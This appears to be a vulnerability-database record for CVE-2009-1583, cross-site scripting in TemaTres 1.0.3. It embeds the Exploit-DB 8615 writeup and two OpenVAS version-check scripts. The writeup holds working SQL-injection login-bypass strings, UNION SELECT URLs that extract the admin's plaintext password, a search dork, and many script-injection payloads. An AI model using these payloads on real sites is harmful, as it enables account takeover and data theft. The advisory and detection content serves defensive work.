ID CVE-2009-1583 Type cve Reporter cve@mitre.org Modified 2018-10-10T19:37:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.
{"id": "CVE-2009-1583", "bulletinFamily": "NVD", "title": "CVE-2009-1583", "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "published": "2009-05-07T23:30:00", "modified": "2018-10-10T19:37:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/34983", "http://secunia.com/advisories/34990", "http://osvdb.org/54247", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50343", "http://www.securityfocus.com/archive/1/503252/100/0/threaded", "http://www.securityfocus.com/bid/34830", "https://www.exploit-db.com/exploits/8615"], "cvelist": ["CVE-2009-1583"], "type": "cve", "lastseen": "2019-05-29T18:09:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "aa39e5e35dbd42d48e9d17e0fa848714"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "8de3bab86f04b1a98d885a2b8cd7f5f7"}, {"key": "cpe23", "hash": "0c656e94f67828b100b1cc58ab1c2d20"}, {"key": "cvelist", "hash": "38dd0d0936fb01b1d3aabf3ac979b2f0"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "ad1f8a506e27a5bed3286d2ef1f5084d"}, {"key": "href", "hash": "773e8d4d141288ada593470f214ee70f"}, {"key": "modified", "hash": "1ca428fc3af04d899761c85377943804"}, {"key": "published", "hash": "7ef995e93881a84cfc1da00e6fa4d6a3"}, {"key": "references", "hash": "96a147656f2eaccb13d350e8ebb9148d"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "358ec1381bb40c663e9e62d0101b72ac"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "e10ead10998d6559428e7076d5db574e2fb0c6893134c2cc940fdae5c5a8210f", "viewCount": 1, "enchantments": {"score": {"value": 4.4, "vector": "NONE", "modified": "2019-05-29T18:09:58"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310800801", "OPENVAS:800801"]}, {"type": "exploitdb", "idList": ["EDB-ID:8615"]}], "modified": "2019-05-29T18:09:58"}, "vulnersScore": 4.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "affectedSoftware": [{"name": "r020 tematres", "operator": "eq", "version": "1.0.3"}, {"name": "r020 tematres", "operator": "eq", "version": "1.031"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:r020:tematres:1.031:*:*:*:*:*:*:*", "cpe:2.3:a:r020:tematres:1.0.3:*:*:*:*:*:*:*"], "cwe": ["CWE-79"]}
{"exploitdb": [{"lastseen": "2016-02-01T07:46:07", "bulletinFamily": "exploit", "description": "TemaTres 1.0.3 (Auth Bypass/SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-1583,CVE-2009-1584,CVE-2009-1585. Webapps exploit for php platform", "modified": "2009-05-05T00:00:00", "published": "2009-05-05T00:00:00", "id": "EDB-ID:8615", "href": "https://www.exploit-db.com/exploits/8615/", "type": "exploitdb", "title": "tematres 1.0.3 auth bypass/sql/XSS Multiple Vulnerabilities", "sourceData": "***********************************************************************************************\n***********************************************************************************************\n**\t \t\t\t\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **\n** || || || [] [][] [] [] [] [] [] [] [] []\t [] [] **\n [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **\n** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\\ \n**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--\n** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ \n [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **\n**\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** \u00c2\u00a1VIVA SPAIN!...\u00c2\u00a1GANAREMOS EL MUNDIAL!...o.O **\n**\t\t\t\t\t\u00c2\u00a1PROUD TO BE SPANISH!\t\t\t\t **\n**\t\t\t\t\t\t\t\t\t\t\t **\n***********************************************************************************************\n***********************************************************************************************\n\n----------------------------------------------------------------------------------------------\n| \t \t \tMULTIPLE REMOTE VULNERABILITIES\t\t \t |\n|--------------------------------------------------------------------------------------------|\n| \t | TemaTres V1.0.3 |\t\t \t\t |\n| CMS INFORMATION:\t\t -----------------\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t |\n|-->WEB: http://www.r020.com.ar/tematres/ \t \t\t |\n|-->DOWNLOAD: http://sourceforge.net/projects/tematres/ \t \t\t |\n|-->DEMO: http://www.r020.com.ar/tematres/index.php\t\t\t\t\t |\n|-->CATEGORY: CMS / Portals\t\t\t\t\t\t\t\t |\n|-->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus |\n| \t\t/ Aplicaci\u00c3\u00b3n Web para la gesti\u00c3\u00b3n de lenguajes documentales, ... \t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n|-->TESTED ON: firefox 3\t\t\t\t\t\t\t\t |\n|-->DORKs: \"Powered by TemaTres\" / \"Generado por TemaTres\" / \"Criado por TemaTres\"\t |\n|-->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS\t\t\t \t\t\t |\n|-->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)\t\t\t\t\t\t |\n|-->Discovered Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Reported Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Fixed bug date: 2009-05-04\t\t\t\t\t\t\t\t |\n|-->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip\t\t |\n|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\n|-->mail: y3nh4ck3r[at]gmail[dot]com\t\t\t\t\t\t\t |\n|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\n|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\n|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)\t\t\t |\n----------------------------------------------------------------------------------------------\n\n############\n------------\nCONDITIONS:\n------------\n############\n\n\n**gpc_magic_quotes=off\n\n**DBPREFIX='lc_' (Default)\n\n\n####################\n--------------------\nAUTH BYPASS (SQLi):\n--------------------\n####################\n\n\nmail:' or 1=1 /*\npassword: Nothing\n\nOr...\n\nmail: Something\npassword:' or 1=1 /*\n\n\n######################\n----------------------\nSQL INJECTION (SQLi):\n----------------------\n######################\n\n\n~~~~---->Unregistered user (get var --> 'letra'):\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>\n\n~~~~---->Resgistered user (get vars --> 'y' and 'm'):\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>\n\n\n############################\n----------------------------\nCROSS SITE SCRIPTING (XSS):\n----------------------------\n############################\n\n\nThere are a lot of links (This isn't entire list):\n\n\n~------->Unregistered user\n\n\n<----Search form---->\n\n<script>while(1){alert('y3nh4ck3r was here!')}</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')</script>&sgs=off\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?estado_id=14\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejemplo\"><script>alert('y3nh4ck3r was here!')</script>\n\n\n~------->Registered user\n\n\n<----Posting here---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12\n\n<script>alert('y3nh4ck3r was here!')</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10\"><script>alert('y3nh4ck3r was here!')</script>&y=2007\n\n\n-------------------EOF---------------------------------->>>ENJOY IT!\n\n\n#######################################################################\n#######################################################################\n##*******************************************************************##\n## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##\n##*******************************************************************##\n##-------------------------------------------------------------------##\n##*******************************************************************##\n## GREETZ TO: JosS, Ulises2k and all spanish Hack3Rs community! ##\n##*******************************************************************##\n#######################################################################\n#######################################################################\n\n# milw0rm.com [2009-05-05]\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8615/"}], "openvas": [{"lastseen": "2017-07-02T21:14:11", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2016-12-30T00:00:00", "published": "2009-05-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800801", "id": "OPENVAS:800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tematres_mult_xss_n_sql_inj_vuln.nasl 4892 2016-12-30 15:39:07Z teissa $\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is\n disabled.\n Impact Level: Application\";\ntag_affected = \"TemaTres version 1.031 and prior\";\ntag_insight = \"Multiple flaws are due to\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO\n inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\";\ntag_solution = \"Upgrade to TemaTres version 1.033 or later.\n For updates refer to http://www.r020.com.ar/tematres/index.en.html#indice\";\ntag_summary = \"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.\";\n\nif(description)\n{\n script_id(800801);\n script_version(\"$Revision: 4892 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-30 16:39:07 +0100 (Fri, 30 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34983\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34990\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8615\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\nif(!tematresPort){\n exit(0);\n}\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:18", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2019-05-14T00:00:00", "published": "2009-05-19T00:00:00", "id": "OPENVAS:1361412562310800801", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800801\");\n script_version(\"2019-05-14T12:12:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 12:12:41 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34983\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34990\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8615\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"tematres/detected\");\n\n script_tag(name:\"impact\", value:\"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is disabled.\");\n\n script_tag(name:\"affected\", value:\"TemaTres version 1.031 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TemaTres version 1.033 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}]}
